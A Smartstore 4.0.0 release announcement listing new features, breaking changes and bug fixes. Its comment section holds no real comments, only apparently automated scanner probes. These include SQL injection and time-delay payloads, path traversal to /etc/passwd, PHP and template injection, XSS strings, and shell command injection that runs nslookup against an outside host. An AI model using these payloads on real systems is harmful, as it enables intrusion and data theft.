Friday, June 26, 2020

Smartstore 4.0.0 is available

Highlights

  • (NEW) Media Manager: Powerful and lightning-fast explorer/manager for media files (commercial plugin exclusively bundled with Pro Edition)
  • (NEW) Rule Builder: Powerful rule system for visual business rule creation
    • Dozens of predefined rules out-of-the-box
    • Supports logical operators (AND/OR) and unlimited grouping/nesting
    • Cart rules: can be applied to discounts, shipping and payment methods
    • Customer rules: used to auto-assign customers to customer groups for 1-to-1 content targeting
    • Product rules: used to auto-assign products to categories based on filter definitions (e.g. price, brand, color, stock etc.)
  • (NEW) New permission (ACL) system: Granular tree-based permission management based on customer groups. Supports inheritance to allow or deny entire permission ranges
  • (NEW) Personalized product recommendations: Replaces homepage products dynamically with personalized product recommendations based on customer interests. (commercial plugin)
  • (NEW) Geo Blocker: Restricts shop access based on visitor country or IP address ranges (commercial plugin)
  • (NEW) Dashboard with charts: New dashboard widgets display key data like orders, customers, bestsellers etc. in nice graphical charts.

Breaking changes

  • (Dev) Install\UninstallPermissions has been removed from IPermissionService. No longer needs to be called by plugins. Permissions are now automatically installed\uninstalled.
  • (Dev) IDiscountRequirementRule and IShippingMethodFilter has been removed. Discounts and shipping methods can now be filtered by rule sets.
  • (Dev) Customer navigation property CustomerRoles has been replaced by CustomerRoleMappings, a new entity for role mappings.
  • The search index must be rebuilt due to various enhancements.
  • (Dev) The wrong name of API endpoint LocalizedPropertys has been corrected and renamed to LocalizedProperties.

New Features

  • Granular permissions: All permissions of a customer directly visible on the customer edit page.
  • DEV: Added Visual Studio extension to create Smartstore Plugins
  • GDPR conform Cookie Consent Manager
  • SEO: XML Sitemap now includes blog, news and forum
  • SEO: do 301 redirect to URL without trailing slash
  • SVG support for image uploads.
  • Schedule tasks: new property "Priority" runs tasks with higher priority first when multiple tasks are pending.
  • Added XML Sitemap settings to backend UI.
  •  Add published property to ProductTag entity.
  •  Apply percentage discounts also on tier prices.
  •  Implement ACL and multistore capability on menu item level.
  •  Menu Builder items: implement support for icon (brand) color.
  • Show bundle item images in order details like in shopping cart details.
  • MegaSearch:
    • Added more text analysis options (e.g. Lucene.Net classic analyzer).
    • Added tool to display internal information about a search, such as Lucene.Net terms.
    •  Find the grouped product when searching for the SKU, GTIN, MPN of a non individually visible, associated product.
    •  Find product when searching for GTIN or MPN of an attribute combination.
    • Perf. Added option to ignore attribute filtering property on product level.
  • Web-API:
    •  Added a parameter to start an import after uploading import files.
    •  Added endpoints for ProductPictures, ProductCategories and ProductManufacturers to allow updating DisplayOrder.
    •  Added endpoints for NewsLetterSubscription.
  •  Direct links to variations on a product.
  •  Add ability to hide products from catalog, but not search.
  • Implement hidden boolean setting that controls which catalog search engine implementation should be used in backend.
  • Enable images and color values for search filters to be stored for specification attribute options.
  • Add field for manufacturer bottom description like for categories.
  • Add new field for product condition.
  • ACL support for manufacturers.
  • Add new field for tracking URL to shipment entity to better track shipments.
  • (Page Builder) Added a Page Builder block to display blog posts.

Improvements

  • Make MeasureDimension and MeasureWeight localizable.
  • Show an example currency value for custom formatting value changes.
  • Card desk instead of a grid for customer addresses on customer edit page.
  • Display "price from" in product lists if any attribute combination price exists.
  • Reworked blog & news section.
  • Activated ReCaptcha without keys can cause the merchant to lock himself out of the shop.
  • Export: let a provider directly export to a file stream instead of a memory stream.
  • Topic editor should display all menu item nodes that reference the current topic.
  • UI: ACL, discount and store selection should be done via multiple select2.
  • Updated UserAgent Parser.
  • TinyImage: updated WebP detection patterns.
  • PayPal PLUS:
    • Apply order of payment methods in backend to the list of third-party payment methods in checkout.
    • Send the billing address when redirecting to PayPal.
  • Hide cart payment button for payment methods without match of applied rule sets.
  • MegaSearch: Support exact value match for numeric range filters.
  • Hide option prizes if "Call for price" is enabled.
  • Debitoor: added an option to force a price type on invoices.
  • BeezUp: export product costs.
  • RTL: fixed alignment of product art badge.
  • Sending of mails to customers uses generic message template now.
  • UI: Added XmlSitemap settings to backend
  • And many more other minor improvements

Bugfixes

  • Export: Fixed KeyNotFoundException when batch size was 1.
  • Fixed KeyNotFoundException when payment method friendly name ends with spaces.
  • Cart: Fixed ShoppingCartSettings.ShowProductBundleImagesOnShoppingCart hides the bundle item name.
  • MegaSearch:
    • Fixed the preset sorting order of products on a manufacturer page may be wrong depending on catalog settings.
    • Price facet filter bypasses Call for Pricing and shows the approximate price of a product.
    • The number of hits for product review facets was wrong in some cases.
    • Do not show facets for manufacturers or categories if they are limited to stores or subject to ACL.
    • Ghost facet filter groups will appear if a numeric value is assigned that matches to a different spec option.
  • Page Builder:
    • Block with z-index < 0 can not be selected in story view - Block tools can reduce z-index below 0.
    • Manually editing/removing block cols/rows does not refresh grid state correctly.
    • Edit Mode rendering bug in Mac Safari
    • Added "Order" property to page Builder block to control rendering order of blocks in HTML output
  • PayPal:
    • Fixed rare exception "Unsupported Media Type" (415) in PayPal PLUS.
    • Only process a partially refund IPN when the order refunded amount is zero. Otherwise the order refunded amount will be wrong.
  • Customer import:
    • VatNumber and other fields were ignored.
    • Customer roles sometimes inserted several times.
    • Changed billing/shipping address was added instead of updating the existing one.
    • Region assigned to an address was not updated.
  • Product tags:
    • Product tag count should filter also based on Visibility.
    • Product tag count sometimes not up-to-date due to missing cache clearance.
  • Debitoor:
    • Avoid errors due to invalid quantity unit Id of 0.
    • rework quantity units.
    • Sometimes the SKU was missing on invoices.
  • Multistore mapping was ignored for manufacturers in sitemap.
  • Categories limited to stores were not displayed in tree view.
  • Fixed InvalidOperationException in CreatePdfInvoiceAttachment when an order is placed by a guest.
  • The ShowDescriptionInSubPages setting should also be applied to the bottom category description.
  • Recaptcha: doesn't work for product reviews, blog and news comments if hidden captcha is activated.
  • Customer FullName is not populated after registration.
  • Web-API: fixed authentication error "Value cannot be null. Parameter name: name" when login type is email.
  • Payone: fixed wrong hash value if redirecting option is activated.
  • Azure: opening the configuration page resulted in an error.
  • Shipping by weight: the surcharge hint was not displayed correctly.
  • Off-canvas menu shows wrong product count for brand menu items.
  • Images of newly added variants could be deleted automatically due to wrong image transient state.
  • Menu display order is ignored for widget zone header_menu_special_after.
  • RTL: Manage categories tree view.
  • Biz-Importer: If the TaxRate table was missing, the assignment of the tax category to the product was not set.
  • Import: adding URL records requires cache to be cleared.
  • The order list summary do not respect all list filters and shows wrong aggregate values.
  • Removing gift card issue.
  • A delivery time cannot be deleted if it is assigned to a variant combination of a deleted product.
  • BeezUp: fixes ArgumentNullException, parameter name "source".
  • Avoid redirecting to the account activation page when trying to log in for the first time.
  • The checkout button disappears when moving a product from the shopping cart to the wishlist.
  • Menu builder: in case of system menus the template can changes accidentally when saving.
  • Structured data: Replace length with depth property.
  • 'View All' button from the offcanvas manufacturer menu causes 404 on mobile.
  • Added missing sitemap task.
  • ESD: browser freezes when editing file changelog
  • And many more other minor fixes...
Leave your comment

Comments (93)

G
3 months ago | Guest
Mr.

1'"

G
3 months ago | Guest
Mr.

\

G
3 months ago | Guest
Mr.

1����%2527%2522

G
3 months ago | Guest
Mr.

@@SzKHF

G
3 months ago | Guest
Mr.

JyI=

G
3 months ago | Guest
Mr.

�'�"

G
3 months ago | Guest
Mr.

�''�""

G
3 months ago | Guest
Mr.

LtC3twNa

G
3 months ago | Guest
Mr.

1*

G
3 months ago | Guest
Mr.

1*

G
3 months ago | Guest
Mr.

1*

G
3 months ago | Guest
Mr.

1*

G
3 months ago | Guest
Mr.

-1 OR 2+612-612-1=0+0+0+1 --

G
3 months ago | Guest
Mr.

-1 OR 3+612-612-1=0+0+0+1 --

G
3 months ago | Guest
Mr.

-1 OR 2+895-895-1=0+0+0+1

G
3 months ago | Guest
Mr.

-1 OR 3+895-895-1=0+0+0+1

G
3 months ago | Guest
Mr.

725'

G
3 months ago | Guest
Mr.

if(now()=sysdate(),sleep(12),0)

G
3 months ago | Guest
Mr.

0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z

G
3 months ago | Guest
Mr.

0"XOR(if(now()=sysdate(),sleep(12),0))XOR"Z

G
3 months ago | Guest
Mr.

(select(0)from(select(sleep(12)))v)/*'+(select(0)from(select(sleep(12)))v)+'"+(select(0)from(select(sleep(12)))v)+"*/

G
3 months ago | Guest
Mr.

-1; waitfor delay '0:0:12' --

G
3 months ago | Guest
Mr.

-1); waitfor delay '0:0:12' --

G
3 months ago | Guest
Mr.

-1)); waitfor delay '0:0:12' --

G
3 months ago | Guest
Mr.

../../../../../../../../../../etc/passwd

G
3 months ago | Guest
Mr.

1 waitfor delay '0:0:12' --

G
3 months ago | Guest
Mr.

nV3jiLDS'; waitfor delay '0:0:12' --

G
3 months ago | Guest
Mr.

../../../../../../../../../../windows/win.ini

G
3 months ago | Guest
Mr.

../

G
3 months ago | Guest
Mr.

./

G
3 months ago | Guest
Mr.

PklSCDbr'); waitfor delay '0:0:12' --

G
3 months ago | Guest
Mr.

FlbVkvxM')); waitfor delay '0:0:12' --

G
3 months ago | Guest
Mr.

-5 OR 750=(SELECT 750 FROM PG_SLEEP(12))--

G
3 months ago | Guest
Mr.

-5) OR 604=(SELECT 604 FROM PG_SLEEP(12))--

G
3 months ago | Guest
Mr.

-1)) OR 797=(SELECT 797 FROM PG_SLEEP(12))--

G
3 months ago | Guest
Mr.

DODlvPzJ' OR 502=(SELECT 502 FROM PG_SLEEP(12))--

G
3 months ago | Guest
Mr.

a6b30AnO') OR 626=(SELECT 626 FROM PG_SLEEP(12))--

G
3 months ago | Guest
Mr.

4FAxzzAQ')) OR 463=(SELECT 463 FROM PG_SLEEP(12))--

G
3 months ago | Guest
Mr.


*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),12)

G
3 months ago | Guest
Mr.

HttP://bxss.me/t/xss.html?%00

G
3 months ago | Guest
Mr.

bxss.me/t/xss.html?%00

G
3 months ago | Guest
Mr.


'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),12)||'

G
3 months ago | Guest
Mr.

;print(md5(31337));

G
3 months ago | Guest
Mr.

';print(md5(31337));$a='

G
3 months ago | Guest
Mr.

";print(md5(31337));$a="

G
3 months ago | Guest
Mr.

${@print(md5(31337))}

G
3 months ago | Guest
Mr.

${@print(md5(31337))}\

G
3 months ago | Guest
Mr.

'.print(md5(31337)).'

G
3 months ago | Guest
Mr.

${9999568+9999780}

G
3 months ago | Guest
Mr.

)

G
3 months ago | Guest
Mr.

!(()&amp;&amp;!|*|*|

G
3 months ago | Guest
Mr.

^(#$!@#$)(()))******

G
3 months ago | Guest
Mr.

echo thuhxy$()\ cbumce\nz^xyu||a #' &amp;echo thuhxy$()\ cbumce\nz^xyu||a #|" &amp;echo thuhxy$()\ cbumce\nz^xyu||a #

G
3 months ago | Guest
Mr.

&amp;echo ucuwjn$()\ ruxepk\nz^xyu||a #' &amp;echo ucuwjn$()\ ruxepk\nz^xyu||a #|" &amp;echo ucuwjn$()\ ruxepk\nz^xyu||a #

G
3 months ago | Guest
Mr.

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

G
3 months ago | Guest
Mr.

1some_inexistent_file_with_long_name.jpg

G
3 months ago | Guest
Mr.

Http://bxss.me/t/fit.txt

G
3 months ago | Guest
Mr.

http://bxss.me/t/fit.txt?.jpg

G
3 months ago | Guest
Mr.

bxss.me

G
3 months ago | Guest
Mr.

|echo eekkit$()\ ufxhtn\nz^xyu||a #' |echo eekkit$()\ ufxhtn\nz^xyu||a #|" |echo eekkit$()\ ufxhtn\nz^xyu||a #

G
3 months ago | Guest
Mr.

(nslookup hitbuywgbgwsk5f9af.bxss.me||perl -e "gethostbyname('hitbuywgbgwsk5f9af.bxss.me')")

G
3 months ago | Guest
Mr.

$(nslookup hitozqrtragoje9085.bxss.me||perl -e "gethostbyname('hitozqrtragoje9085.bxss.me')")

G
3 months ago | Guest
Mr.

&amp;(nslookup hitgureluavlt8e1a8.bxss.me||perl -e "gethostbyname('hitgureluavlt8e1a8.bxss.me')")&amp;'\"`0&amp;(nslookup hitgureluavlt8e1a8.bxss.me||perl -e "gethostbyname('hitgureluavlt8e1a8.bxss.me')")&amp;`'

G
3 months ago | Guest
Mr.

|(nslookup hitvroqnnjfgnd2656.bxss.me||perl -e "gethostbyname('hitvroqnnjfgnd2656.bxss.me')")

G
3 months ago | Guest
Mr.

`(nslookup hitxumhjychzgd03e2.bxss.me||perl -e "gethostbyname('hitxumhjychzgd03e2.bxss.me')")`

G
3 months ago | Guest
Mr.

;(nslookup hittwlcfgqanw008ab.bxss.me||perl -e "gethostbyname('hittwlcfgqanw008ab.bxss.me')")|(nslookup hittwlcfgqanw008ab.bxss.me||perl -e "gethostbyname('hittwlcfgqanw008ab.bxss.me')")&amp;(nslookup hittwlcfgqanw008ab.bxss.me||perl -e "gethostbyname('hittwlcfgqanw008ab.bxss.me')")

G
3 months ago | Guest
Mr.

smartstore-4-0-0-is-available

G
3 months ago | Guest
Mr.

smartstore-4-0-0-is-available

G
3 months ago | Guest
Mr.

smartstore-4-0-0-is-available/.

G
3 months ago | Guest
Mr.


'"()&amp;%

G
3 months ago | Guest
Mr.

'"()&amp;%

G
3 months ago | Guest
Mr.


9992369

G
3 months ago | Guest
Mr.

acu4504<s1﹥s2ʺs3ʹuca4504

G
3 months ago | Guest
Mr.

acux8188��z1��z2a�bcxuca8188

G
3 months ago | Guest
Mr.

CWS000x�=�1N�@E߮��I)�@��  �HiP"D�F� G&amp;َ7��܂�rX;!S��̛����7Jq���.�&gt;�p�c�l��zG�ܾM�dkj�,��(��T�Jj)�"�T7$��H�D6)� x)��ؒ�\C�|�Q�Nc�b��� b_&amp;�5 h��g�
]s��0Q�L&lt;�6�L�_�w~�[�/[�m{����:n-����.�d1d��?6�0  

G
3 months ago | Guest
Mr.

{{49767*50145}}

G
3 months ago | Guest
Mr.


IpT&gt;

G
3 months ago | Guest
Mr.


&lt;ScRiPt
&gt;iVjI(9838)

G
3 months ago | Guest
Mr.


<form><hr><label>This is a searchable index. Enter search keywords: <input name="isindex" type="image" src="1"></label><hr></form>

G
3 months ago | Guest
Mr.


<img src="//xss.bxss.me/t/dot.gif">

G
3 months ago | Guest
Mr.


<img src="xyz">

G
3 months ago | Guest
Mr.


<img src="&gt;">

G
3 months ago | Guest
Mr.

%0D%0A%3C%53%63%52%69%50%74%20%3E%69%56%6A%49%289681%29%3C%2F%73%43%72%69%70%54%3E

G
3 months ago | Guest
Mr.


\u003CScRiPt\iVjI(9566)\u003C/sCripT\u003E

G
3 months ago | Guest
Mr.


&lt;ScRiPt&gt;iVjI(9033)&lt;/sCripT&gt;

G
3 months ago | Guest
Mr.

�<img>

G
3 months ago | Guest
Mr.


<input>

G
3 months ago | Guest
Mr.

<a href="http://xss.bxss.me"></a>

G
3 months ago | Guest
Mr.

<a></a>

G
3 months ago | Guest
Mr.

[url=http://xss.bxss.me][/url]

G
3 months ago | Guest
Mr.


}body{acu:Expre/**/SSion(iVjI(9498))}

G
3 months ago | Guest
Mr.


&lt;% contenteditable onresize=iVjI(9059)&gt;

G
3 months ago | Guest
Mr.


TjBhl